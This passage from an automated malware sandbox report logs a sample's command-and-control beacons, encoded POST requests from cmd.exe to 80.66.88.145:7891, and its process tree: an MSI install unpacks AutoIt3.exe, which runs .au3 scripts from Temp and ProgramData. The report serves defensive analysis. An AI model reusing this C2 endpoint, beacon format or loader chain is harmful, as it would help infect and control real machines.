                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoSlcE76cEOrloOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
                                                        Jul 26, 2023 14:01:11.466541052 CEST7INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:11 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.44970280.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:15.589994907 CEST9OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 145
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnQIFHwC&act=1000
                                                        Jul 26, 2023 14:01:15.624844074 CEST9INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:15 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.44970380.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:15.720359087 CEST10OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 524
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
                                                        Jul 26, 2023 14:01:15.758169889 CEST10INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:15 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.44970780.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:19.834906101 CEST12OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 65
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnQIFHwC&act=1000
                                                        Jul 26, 2023 14:01:19.870748997 CEST13INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:19 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.44970880.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:19.944116116 CEST14OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 524
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
                                                        Jul 26, 2023 14:01:19.982505083 CEST14INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:19 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.44971580.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:00.962183952 CEST49OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 144
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:01.004143000 CEST49INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:02:00 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        9192.168.2.44971780.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:01.069787025 CEST50OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 520
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Jul 26, 2023 14:02:01.108280897 CEST50INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:01 GMT


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:14:00:54
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\msiexec.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
                                                        Imagebase:0x7ff71c140000
                                                        File size:66'048 bytes
                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:1
                                                        Start time:14:00:54
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\msiexec.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                        Imagebase:0x7ff71c140000
                                                        File size:66'048 bytes
                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:3
                                                        Start time:14:00:56
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
                                                        Imagebase:0x1220000
                                                        File size:59'904 bytes
                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:4
                                                        Start time:14:00:57
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\icacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:29'696 bytes
                                                        MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:5
                                                        Start time:14:00:57
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:6
                                                        Start time:14:00:58
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\expand.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                        Imagebase:0x1100000
                                                        File size:52'736 bytes
                                                        MD5 hash:8F8C20238C1194A428021AC62257436D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:7
                                                        Start time:14:00:58
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:8
                                                        Start time:14:00:59
                                                        Start date:26/07/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
                                                        Imagebase:0x980000
                                                        File size:893'608 bytes
                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi

                                                        General

                                                        Target ID:9
                                                        Start time:14:01:03
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe
                                                        Imagebase:0xd90000
                                                        File size:232'960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:10
                                                        Start time:14:01:05
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\icacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                        Imagebase:0x940000
                                                        File size:29'696 bytes
                                                        MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:11
                                                        Start time:14:01:05
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:12
                                                        Start time:14:01:12
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                        Imagebase:0xe20000
                                                        File size:124'632 bytes
                                                        MD5 hash:CFD37109A4E595C2957C5E0ACC198E8A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:13
                                                        Start time:14:01:14
                                                        Start date:26/07/2023
                                                        Path:C:\ProgramData\fkeabad\Autoit3.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
                                                        Imagebase:0xe90000
                                                        File size:893'608 bytes
                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Antivirus matches:
                                                        • Detection: 3%, ReversingLabs

                                                        General

                                                        Target ID:14
                                                        Start time:14:01:17
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe
                                                        Imagebase:0xd90000
                                                        File size:232'960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:15
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:16
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:17
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:18
                                                        Start time:14:01:27
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:19
                                                        Start time:14:01:27
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:20
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:21
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:22
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
